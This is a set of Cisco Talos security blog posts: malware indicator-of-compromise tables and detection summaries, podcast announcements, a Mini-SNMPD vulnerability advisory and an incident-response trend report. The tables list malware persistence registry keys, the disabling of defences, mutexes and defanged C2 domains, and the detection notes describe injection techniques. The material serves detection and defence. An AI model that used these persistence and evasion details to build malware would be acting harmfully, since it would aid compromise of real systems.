<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN	8
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED Value Name: Hidden	7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: EnableLUA	7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC Value Name: Start	7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND Value Name: Start	7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED Value Name: ShowSuperHidden	7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS Value Name: Start	7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC Value Name: Start	7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV Value Name: Start	7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER Value Name: TaskbarNoNotification	7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER Value Name: TaskbarNoNotification	7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER Value Name: HideSCAHealth	7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER Value Name: HideSCAHealth	7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN	7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: 2827271685	7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 2827271685	5
<HKCU>\SOFTWARE\WINRAR	2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9 Value Name: F	2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5 Value Name: F	2
<HKCU>\SOFTWARE\WINRAR Value Name: HWID	2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC Value Name: F	2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Service Host Process for Windows	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: help	1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: help	1

Mutexes	Occurrences
qazwsxedc	16
04F453E614B75F818C01D1BD88F5825B98B68E3C	7
Frz_State	5
Local\https://docs.microsoft.com/	1
YAHWKKS65HAKSDJA	1
Mutex_Y1vFO98bB6v9Q8lC815ehD1xoEvADrFwNqccccSHudZP31Qt	1
Mutex_nLoOSZQIZqWgQsQHTpJ1ymgM69XnbNuwA89bPTRycpnppKwx	1
2BC133F114B75F818C01D1BDA7C0E24C98B68E3C	1
2CA90D003CEA016700C2B1832C6BBC833C28B0E4	1
AA2A0D04BA6901638641B1872C6BBC833C28B0E4	1
A1356D9DB17661FA8D5ED11E2C6BBC833C28B0E4	1
7B0110536B421C34576AACD02C6BBC833C28B0E4	1
B3CC54B3A38F58D49FA7E8302C6BBC833C28B0E4	1
F99113FAE9D21F9DD5FAAF792C6BBC833C28B0E4	1
0527C9131564C574294C75902C6BBC833C28B0E4	1
12C5B9C22DB3D5B2119B6556035EDC943C28B0E4	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
204[.]79[.]197[.]203	8
23[.]193[.]177[.]127	8
23[.]66[.]61[.]153	8
40[.]91[.]124[.]111	7
40[.]90[.]247[.]210	7
23[.]6[.]69[.]99	7
20[.]45[.]1[.]107	5
23[.]0[.]48[.]75	5
23[.]13[.]211[.]142	4
23[.]218[.]40[.]161	3
13[.]107[.]21[.]200	2
36[.]38[.]34[.]230	2
40[.]112[.]72[.]205	2
172[.]217[.]12[.]238	2
104[.]102[.]89[.]231	2
212[.]27[.]63[.]115	2
23[.]0[.]209[.]167	2
23[.]221[.]48[.]201	2
207[.]148[.]248[.]143	1
204[.]79[.]197[.]200	1
184[.]105[.]192[.]2	1
172[.]217[.]12[.]142	1
172[.]217[.]197[.]156	1
23[.]20[.]239[.]12	1
40[.]76[.]4[.]15	1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
m[.]googlex[.]me	15
w[.]googlex[.]me	15
outlook[.]com	8
rover[.]ebay[.]com	8
www[.]onenote[.]com	8
www[.]msn[.]com	8
java[.]com	8
itunes[.]apple[.]com	8
contextual[.]media[.]net	8
img-s-msn-com[.]akamaized[.]net	8
www[.]autotrader[.]com	8
g[.]msn[.]com	8
flights[.]msn[.]com	8
linkmaker[.]itunes[.]apple[.]com	8
www[.]comparecards[.]com	8
carrentals[.]msn[.]com	8
blog[.]msn[.]com	8
static-global-s-msn-com[.]akamaized[.]net	8
www[.]skype[.]com	8
www[.]adobe[.]com	8
www[.]fool[.]com	8
www[.]nextadvisor[.]com	8
e7933[.]dsca[.]akamaiedge[.]net	8
widgets[.]tree[.]com	8
redirect[.]viglink[.]com	8

*See JSON for more IOCs

Files and or directories created	Occurrences
%APPDATA%\aewefdvg	7
%APPDATA%\aewefdvg\jisgivdt.exe	7
%ProgramData%\Media Center Programs	2
%APPDATA%\csrss.exe	1
%APPDATA%\svchost.exe	1
%APPDATA%\InstallDir	1
%APPDATA%\InstallDir\help.exe	1
%APPDATA%\rundll32.exe	1
%APPDATA%\Other.res	1
%APPDATA%\cstbddwb	1
%APPDATA%\cstbddwb\jisgivdt.exe	1
%TEMP%\1539673208.bat	1
%TEMP%\1539674363.bat	1
%APPDATA%\ctrjauaa\dtcisave.exe	1
%TEMP%\52781.bat	1
%APPDATA%\rrcrauae\dtcisave.exe	1
%APPDATA%\rbdfguju\dtcisave.exe	1
%APPDATA%\hsabbafd\dtcisave.exe	1
%APPDATA%\sdttfesd\dtcisave.exe	1
%TEMP%\307718.bat	1
%APPDATA%\wjjbbdwr\dtcisave.exe	1
%APPDATA%\afchtjbd\dtcisave.exe	1
%APPDATA%\bctfsjtc\dtcisave.exe	1

File Hashes

09c2143145ee9c113455c149c6ff6f951a2fd67638becc0c21bdb9c1a93e5bc3 1c6068227c934bd7eafa19513c90f83c6e84291689c529efdff52d3bbaee71ad 204fb306993b6547b953c6792d3f5e1c7c24ed1e70c40d0744f5c23d5ecc6260 2121cfce691f58d55a6865d9b0fbadfb37b1cc1b7f50e13914fc8c36d6df7a52 232c60a2fe47c6441527e0f708a695bad64770c4788d65d849895618b37ac537 2fd8a99f2e9d9940779d65f0271bedefccdea87cf9bfee5d456cdba538cd8701 322a2d80f46734cb2605d9eb0d8e7e3e100e36aced1e93302c5ce3151fffc728 34a56d4e0a80a296cfa11f929536f3d2d2ce576e28d1460259b3a2ae72c92a55 3858b2a58127adff7565ba59d9622cb82c27d7b60bb7338a35d7f9396bbb20b1 3c9dab4a204a151e2658a66e948a71790e876c657f48fd449cc57ecd79b50a77 4a461c876e41c8f10b8c682311650f535d607089e3aa930aecfcf7d0400bfb18 6854eeaf50e91cfd239713b8532ada3670c4007d30db92f7a10dcaf3919ad122 7baa48ce1d5b0783fe77a8236301991ebad8cbbfb2726d72ee7baf830be1bfac 9adc55c4337148fa4e463ef6bf008f2423dcf9a17eb0d5dcd245aa932dadd9f5 a6140aa4b277141779e6344174f88e6901e8c2921d49624f4d8a2419afa5cf93 aa6dea172c9db744c31a322163e6ec829517400a8f2af996dda345e9ab5097b8 b97f5e3d1a881e93633bcf38414d63916ba1dde8c5368d34a16aecdd227f16f1 c8a0dae1be189ebb115341551175322f8544c1a169573b43ac015b36ef2bf711 caab2cd143d3ad7e0890b3fe5a561b5a264c089186bf41ee213b1e4a32eedee4 d3cda596ba6945b34c331271ad243e81858a5614713143b04c18d1dea325e0f5 fc10ad68ba5fa127c089389f1acacb6635ae64df1525ec87dad928d7c6ac60b7 fee972c5f99500d1ac8e83ad65484494772885e18721c02f95e256c30f3f8bd2

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella
WSA

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Malware.Nymaim-7565328-1

Indicators of Compromise

Registry Keys	Occurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK	12
<HKCU>\SOFTWARE\MICROSOFT\KPQL	12
<HKCU>\SOFTWARE\MICROSOFT\GOCFK Value Name: mbijg	12
<HKCU>\SOFTWARE\MICROSOFT\KPQL Value Name: efp	12

Mutexes	Occurrences
Local\{06258131-BA39-27D4-02A0-AD682205B627}	12
Local\{2D6DB911-C222-9814-3135-344B99BBA4BA}	12
Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}	12
Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}	12
Local\{D8E7AB94-6F65-71DE-8DA1-FE621BE2E606}	12
Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}	12
Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}	12
Local\{338F4080-2AF8-328F-1D44-E65FAFBB3088}	12
Local\{83B9D177-24D4-29BF-C0FB-035E7B3F2D46}	12

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
gvjmoleiqx[.]com	11
hjlxybnt[.]pw	11
mxsffkacgxhb[.]in	11
aqnwun[.]net	11
sppja[.]net	11
wkbbomuxzbhk[.]com	11
ipfmg[.]pw	11
tznyr[.]com	11
tajlmh[.]com	11
flphjxmni[.]com	11
ezkdeavdhzte[.]com	11
lmlnzwlwgn[.]com	11
ebiodd[.]pw	11
krbmzpx[.]com	11
llqikewmnt[.]net	11
lgniduzwgg[.]pw	11
rdbaqoj[.]pw	11
ljcpqydcptw[.]pw	11
jaokwlaiwjx[.]in	11
spiesfhvlq[.]in	11
pewxbb[.]pw	11
yabnl[.]in	11
gejetvtxpjze[.]in	11
qrqtmeuk[.]net	11
wicxqfc[.]in	11

*See JSON for more IOCs

Files and or directories created	Occurrences
%TEMP%\fro.dfx	12
%TEMP%\npsosm.pan	12
\Documents and Settings\All Users\pxs\dvf.evp	12
\Documents and Settings\All Users\pxs\pil.ohu	12
%ProgramData%\ph	12
%ProgramData%\ph\eqdw.dbc	12
%ProgramData%\ph\fktiipx.ftf	12
%TEMP%\gocf.ksv	12
%TEMP%\kpqlnn.iuy	12

File Hashes

0a32a31d2b9d356c8887506ac547d5f44cc34ab40d8549d3f79709a9fa84381c 14d5e17e32f558058739e0633b2e61851186500c0aa80967dac57968e018fe37 16b1ca029162ab6c4a241d60d2de8a015a8cd866f050b9847d228ab3ba0704ba 4019c94cf57c53ae814fe62f7aa804829a909d19c23922b60921f1418deb51e8 46eef4a7440acb228050b0ec2c4ba6c3e47d5e3f75a6f6bb184a946bd502ce66 4b3dead1bc0865f079731c4f7ce6e19487724e80b39ded94371c09edc6978a48 6c89b38394fbfdcc1766d401d0bf54281e7c4d47388e1a0c99c962655bc6fdb6 7878d706f9f3a683904db685ebe2b6ead7464ec142ef239f242e19ebe1a6fe67 8875970e47c112f058e29d254371350ce058376a791fd9fdabad2ab2ed8dc83c b79952df8a801d9a8619d1254a24bde3ce37ea8ebfd17ca8eb48bdd90b27b305 d1c1dcbee46d723b931f1a18ec83f5f22c515edfcdf4dcd9e04a9ab8f173b4d2 d9273903d761b64374ab16e83b854d412ac27983b95a908f52254992b6092903

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella
WSA

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Packed.ZBot-7563206-1

Indicators of Compromise

Registry Keys	Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS Value Name: LoadAppInit_DLLs	19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS Value Name: AppInit_DLLs	19

Files and or directories created	Occurrences
%System32%\Tasks\aybbmte	19
%ProgramData%\Mozilla\thfirxd.exe	19
%ProgramData%\Mozilla\lygbwac.dll	19
%HOMEPATH%\APPLIC~1\Mozilla\kvlcuie.dll	16
%HOMEPATH%\APPLIC~1\Mozilla\tfbkpde.exe	16
%SystemRoot%\Tasks\kylaxsk.job	16

File Hashes

32d3d77c246077febd6a51c1c4af6cd0ef6e991f9d058814670b4d9b1ffb5929 35dba41629d3ef8e563339fe6169c2ddd9c630667a60e90e50d4901ce0fb3114 47364b16ec0b8af99154c5afb4c55f758c5ffbdc19759c039195d0f630a9fddd 5a3bdec2815d798fed747fd136c383305614c2d708805f5b5100dccce12188d9 64d56df10e94e1fff9ba9592660193168dcaece38ec92682326f7e3a6302c2ca 6ddf8b1b3866f32e26e61bf68e33e74444b591dc64642afe1b842d86cfdf5b33 7319a595fc991cae27e5057bb14714efa68ad74456f8c7c6eedd23575f3c5a47 7dfbb5e40028da7c503344cd4630727b71448ce1bcb2b2164e3217652578e623 8b3a463fc845258b9a4f60f60e853243b748de58ad4758e167decbc22ffe80cb 8c5f9e03729e46d8feb08d5357f21e888f1c922fd13edd626b9e5fea5ade7876 908e06fa764660785cc8f7c02090cbc783b8c2824a2524caefdf26279bae831c b2e187349a3e50eb0e1252a242f65d675cae2e32d362c6025c8cc966922dbf63 cbf3982f100358e34b4c2dc2782886a76432f1dad59761f747c1e8bc10ccec8c d5125b8c5dffe7fa67289ca75fed8d237ba399c779032bef27326d59fc458754 d84cd0947dd7a4c73239b992173267907bdf55fc28976797d2af7ed300bfaf83 d9134462d8be534f26973c5e19767c3c745262573f294cef1ab3b917eb410f98 d9c47353ee4c964a9f2bc115c1d47d02b0219839dbeccc6a72ac5d2df0a6905a e032675300402235fcd213f5b6790097b430051353034d23cacf207a0f642647 f21985a67551565d464004a7661d21a29d1581157955349e9a04dea717ab23d5

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security	N/A
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA	N/A

Screenshots of Detection

AMP

ThreatGrid

---

PUA.Win.File.Dealply-7563212-0

Indicators of Compromise

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
54[.]146[.]91[.]247	14
52[.]41[.]141[.]111	12
34[.]231[.]131[.]84	11
54[.]149[.]89[.]229	8
198[.]50[.]173[.]223	8
54[.]69[.]88[.]117	7
35[.]164[.]24[.]169	7
52[.]37[.]160[.]176	5
54[.]213[.]123[.]75	2
207[.]154[.]205[.]3	2
172[.]217[.]12[.]174	1
172[.]217[.]12[.]142	1
151[.]80[.]42[.]103	1
23[.]221[.]50[.]122	1
5[.]9[.]9[.]18	1
172[.]217[.]13[.]238	1
23[.]54[.]219[.]51	1
185[.]107[.]71[.]41	1
51[.]38[.]57[.]168	1
159[.]89[.]184[.]138	1
23[.]3[.]126[.]219	1
165[.]227[.]137[.]252	1
23[.]0[.]52[.]194	1
178[.]79[.]169[.]193	1
149[.]56[.]157[.]112	1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
info[.]yidadaridap[.]com	25
rp[.]yidadaridap[.]com	25
sourceforge[.]net	9
media[.]phpnuke[.]org	8
os2[.]yidadaridap[.]com	8
os[.]yidadaridap[.]com	8
mydati[.]com	3
schema[.]org	2
www[.]gstatic[.]com	1
market[.]android[.]com	1
i[.]ytimg[.]com	1
lh3[.]googleusercontent[.]com	1
img-prod-cms-rt-microsoft-com[.]akamaized[.]net	1
developer[.]android[.]com	1
channel9[.]msdn[.]com	1
store[.]office[.]com	1
products[.]office[.]com	1
assets[.]onestore[.]ms	1
statics-marketingsites-wcus-ms-com[.]akamaized[.]net	1
pf[.]benjaminstrahs[.]com	1
www[.]deadpoolgame[.]com	1
trials[.]dynamics[.]com	1
www[.]azure[.]com	1
www[.]befunky[.]com	1
www[.]rockstargames[.]com	1

*See JSON for more IOCs

Files and or directories created	Occurrences
%TEMP%\in10F4BD16	25
%TEMP%\in10F4BD16\472F35C2.tmp	25
%TEMP%\<random, matching '[A-F0-9]{8}'>.log	25
%TEMP%\INH162~1\css\ie6_main.css	24
%TEMP%\INH162~1\css\main.css	24
%TEMP%\INH162~1\css\sdk-ui\browse.css	24
%TEMP%\INH162~1\css\sdk-ui\button.css	24
%TEMP%\INH162~1\css\sdk-ui\checkbox.css	24
%TEMP%\INH162~1\css\sdk-ui\images\button-bg.png	24
%TEMP%\INH162~1\css\sdk-ui\images\progress-bg-corner.png	24
%TEMP%\INH162~1\css\sdk-ui\images\progress-bg.png	24
%TEMP%\INH162~1\css\sdk-ui\images\progress-bg2.png	24
%TEMP%\INH162~1\css\sdk-ui\progress-bar.css	24
%TEMP%\INH162~1\csshover3.htc	24
%TEMP%\INH162~1\images\BG.png	24
%TEMP%\INH162~1\images\Button.png	24
%TEMP%\INH162~1\images\Button_Hover.png	24
%TEMP%\INH162~1\images\Close.png	24
%TEMP%\INH162~1\images\Close_Hover.png	24
%TEMP%\INH162~1\images\Icon_Generic.png	24
%TEMP%\INH162~1\images\Loader.gif	24
%TEMP%\INH162~1\images\Pause_Button.png	24
%TEMP%\INH162~1\images\Progress.png	24
%TEMP%\INH162~1\images\ProgressBar.png	24
%TEMP%\INH162~1\images\Quick_Specs.png	24

*See JSON for more IOCs

File Hashes

029c5f2c2dbec036f397cd9f0352c99b5518adb48e9e0c14479b1042de97a8e1 043768f5d9923ecd231657dd90b8c5557987c0a96dbb0e90366c64d62893911d 049576cad41dcdad343c0e1b724cdc9ff854ad7f519d02dff60f5e5e611d4e4b 10e6962923b5afccb804f0089fdcfc47d33f8006bdc6b806b6d954e8a9df2ac2 192426fc265d7bd4d385b3c5a983725a754927d65ebc62c3097b2f41f447e4fa 1c99f891424cb56a090d2e1eb5625db0786f04c6704c82532198024a63a7c50a 2a1a4e11fa18befb29b00399de5af5c17d1d62c361cf1ca0ea069041a79abc39 2fc2a60b7154f47293e51d82e49f8c467b0e61dfa308b1bc53496a885fe730a6 49c4f31b2aae590042eaf9822d3256471ba862a5d2de4b6e8c1c9ba7994f42cd 4e62b6d6df8e3c2b00e4c8769e50cd8a8649b050b99c21e86bff2a344b43ee0b 528941efc56008a7f2c96ebf3f48a27733d95cc3802e1047be791bf0b1524795 57ff8a4bb6c0ff378c413d8e671ac4df2a896124a2b8bfdd56778ec44ba9641e 5be89eb16dab481ea1fb47f9800113bda32e7242230937f9500ce5df602ae1dc 5e4c796fa1e9e895c559d56bf51378a5af8a1341c8a253b289cc97530b757dd7 62a0f3ce3d7b54ca3bd95ec76ab45c226dfbce40ac0743d2dc0d5c73288e6d13 69d1e5b5468e4d083b98f6ed1fc85b98154144286e659390f63a8ad4fee575e6 6acacd65413137480a9e3ee60aa2cb8be000e0e5fc5ff4af2e206d8fcaddb3cf 6cb2a0a139bd72d43509b892d108c93ecf4e1f24e8267ce3862fe48ca35f4447 72948fecb2e7925785c76419a7d94686b1fa4dc3b165607f4cdf28655d69c612 72d3672de410e718288fdb19a2ea817f303f7b68a3358e2b63c4c6c06e4ee6f6 88ccf70fd42ad193bb82044191e4a3cb7eda3b7af3a9a1034104fe5b99e43888 914573db0bfe9ccdf1a102828397523f3abac13a8859b13d743f15fa7de00096 948cb02c5eb1afade4086c04f3954748cd37707a1f44ba6854bd38258844cbec a0c5d45bb1b35ff2f76e4b96112de328d2bf0032a5fefa843a6be6c14cf96d0f ac927c4c24469eb1de203e32a56bce3a0fa4eca37b4388fd35e6be699f8dc7e7

*See JSON for more IOCs

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security	N/A
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA	N/A

Screenshots of Detection

AMP

ThreatGrid

---

Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

CVE-2019-0708 detected - (5959)

An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.

Process hollowing detected - (313)

Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.

Kovter injection detected - (220)

A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

Gamarue malware detected - (188)

Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

Installcore adware detected - (111)

Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.

Excessively long PowerShell command detected - (84)

A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.

Reverse http payload detected - (32)

An exploit payload intended to connect back to an attacker controlled host using http has been detected.

Atom Bombing code injection technique detected - (32)

A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.

Dealply adware detected - (22)

DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.

Corebot malware detected - (16)

Corebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking.

Beers with Talos Ep. #71: I Have the Power(Shell)

January 31, 2020, 1:09 pm

≫ Next: Talos Takes back with new episode, feed

≪ Previous: Threat Roundup for January 24 to January 31

$

0

0

Beers with Talos (BWT) Podcast episode No. 71 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded Jan. 17, 2020

PowerShell is a frequent flyer in security headlines — a powerful and oft-wielded tool for attackers and defenders alike. This episode takes a look at PowerShell and how to help ensure its security posture as an effective management tool. We also look at the missing-the-forest-for-the-trees concept behind being concerned about the latest shiny ATP before all else.

The timeline:

• 00:50 — Roundtable Q&A: Nigel questions Craig's mid-life crisis
• 07:00 — PowerShell and being a master of your Windows universe
• 13:15 — Using PowerShell with security in mind
• 29:05 — Defense-in-depth (a fave topic): Strategy, not tactics, is how to defend against APTs
• 44:00 — Closing thoughts and parting shots

Links and resources:

• Microsoft guidance on securing PowerShell
• Mitre guidance on PowerShell
• Don’t need PowerShell? MS says block it
• How Craig gets pulled into Twitter rants

==========

Featuring: Craig Williams (@Security_Craig), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff)

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

Talos Takes back with new episode, feed

February 3, 2020, 8:34 am

≫ Next: Vulnerability Spotlight: Denial-of-service, information leak bugs in Mini-SNMPD

≪ Previous: Beers with Talos Ep. #71: I Have the Power(Shell)

$

0

0

By Jon Munshaw.

Talos Takes, our new bite-size podcast, is back with its own feed and a new show.

We first unveiled Talos Takes in early December, and took some time to develop a new Talos Podcasts page to accommodate Talos Takes and Beers with Talos. Now you have two Talos shows you can subscribe to!

We'll be adding Talos Takes to Apple Podcasts, Google Play and other services very soon. For now, you can check out our RSS feed and all episodes here.

Our newest episode focuses on password management, hosted by Nick Biasini and Earl Carter.

Vulnerability Spotlight: Denial-of-service, information leak bugs in Mini-SNMPD

February 3, 2020, 11:11 am

≫ Next: Quarterly Report: Incident Response trends in fall 2019

≪ Previous: Talos Takes back with new episode, feed

$

0

0

Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

Multiple vulnerabilities exist in Mini-SNMPD, a lightweight implementation of a Simple Network Management Protocol server. An attacker can exploit these bugs by providing a specially crafted SNMPD request to the user. These vulnerabilities could lead to a variety of conditions, potentially resulting in the disclosure of sensitive information and a denial-of-service condition.

Mini-SNMPD's small code size and memory footprint make it especially suitable for small and embedded devices. It is used, for example, by several devices based on the OpenWRT project.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Mini-SNMPD to ensure that these issues are resolved and that an update is available for affected customers. Talos also provided the patch for these issues.

Vulnerability details

Mini-SNMPD decode_cnt information leak vulnerability (TALOS-2020-0975/CVE-2020-6058)

An exploitable out-of-bounds read vulnerability exists in the way MiniSNMPD version 1.4 parses incoming SNMP packets. A specially crafted SNMP request can trigger an out-of-bounds memory read, which can result in the disclosure of sensitive information and denial of service. To trigger this vulnerability, an attacker needs to send a specially crafted packet to the vulnerable server.

Read the complete vulnerability advisory here for additional information.

Mini-SNMPD decode_int information leak vulnerability (TALOS-2020-0976/CVE-2020-6059)

An exploitable out-of-bounds read vulnerability exists in the way MiniSNMPD version 1.4 parses incoming SNMP packets. A specially crafted SNMP request can trigger an out-of-bounds memory read, which can result in the disclosure of sensitive information and denial of service. To trigger this vulnerability, an attacker needs to send a specially crafted packet to the vulnerable server.

Read the complete vulnerability advisory here for additional information.

Mini-SNMPD socket disconnect denial-of-service vulnerability (TALOS-2020-0977/CVE-2020-6060)

A stack buffer overflow vulnerability exists in the way MiniSNMPD version 1.4 handles multiple connections. A specially timed sequence of SNMP connections can trigger a stack overflow, resulting in a denial of service. To trigger this vulnerability, an attacker needs to simply initiate multiple connections to the server.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that version 1.4 of Mini-SNMPD is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 52836, 52837

Quarterly Report: Incident Response trends in fall 2019

February 5, 2020, 10:12 am

≫ Next: Threat Source newsletter (Feb. 6, 2020)

≪ Previous: Vulnerability Spotlight: Denial-of-service, information leak bugs in Mini-SNMPD

$

0

0

By David Liebenberg and Kendall McKay.

While many Cisco Talos Incident Response (CTIR) engagements have shown similar patterns over the past two quarters, we’re seeing a dangerous trend emerge this winter. Threat actors are increasingly combining the exfiltration of sensitive data along with data encryption as new levers to compel victims to pay.

Targeting

A wide variety of verticals were once again targeted, including media, government, healthcare, and manufacturing, with the latter representing the top vertical targeted. The number of engagements closed out was around the same as the previous quarter.

Threats

Although we observed some new trends this quarter — including an uptick in web application exploits, a website defacement incident, and some new evasive tactics — this quarter demonstrated the continued threat posed by Trickbot, especially when it is leveraged as a dropper for ransomware such as Ryuk. The top threats for fall 2019 remained Trickbot and Ryuk. In a typical engagement, the target would receive a phishing email with a malicious link or document attached that would lead to the victim downloading Trickbot. The adversaries would use Trickbot and open-source tools such as PowerShell, Empire, or Bloodhound to profile the victim, eventually dropping Ryuk after some dwell time (in one engagement, this lasted up to nearly a year) and demanding a ransom.

We also observed an instance of threat actors using an unusual method to deploy Ryuk. Following a Trikbot infection, the adversaries deployed Ryuk throughout the Active Directory environment as a group policy object, whereas adversaries typically leverage PsExec to deploy the ransomware.

The top threats observed this quarter are relatively consistent with those from the last quarter, though the commodity trojan Emotet appeared much less frequently. In another change, we did not observe any incidents related to illicit mining, though there was a reemergence in the winter. We did, however, observe some malware that we had not seen in the previous quarter, including infostealers like Lokibiot and Avemaria, ASP web shells, and the Frenchy toolkit.

Initial Vectors

Phishing remained the top infection vector. CTIR also observed an uptick in web application exploitation, including the exploitation of newer vulnerabilities, such as in the Palo Alto GlobalProtect SSL VPN. We also observed third-party compromise in which a target’s GitHub account was compromised and the attackers stole a stored Amazon identity access management account.

Actions after compromise

Actions post-compromise remained consistent with last quarter, ranging from encrypting data to connecting to command-and-control and moving laterally throughout the victim network. We did observe defacement this quarter as well as an uptick in evasive actions.

Looking forward

Although this blog covers fall 2019, CTIR has observed initial indicators that suggest an evolution in threat actor behavior in winter 2019/2020: Ransomware actors have begun exfiltrating sensitive data from victim organizations and threatening to publish them if the ransom is not paid.

Talos observed this behavior in two separate engagements in the winter that were perpetrated by the same actor. In both incidents, the actor leveraged the offensive security tool CobaltStrike to traverse the network and gather systems and data. The actor then exfiltrated the data using PowerShell to connect to an FTP server, after which the adversary deployed Maze ransomware in the victim environment.

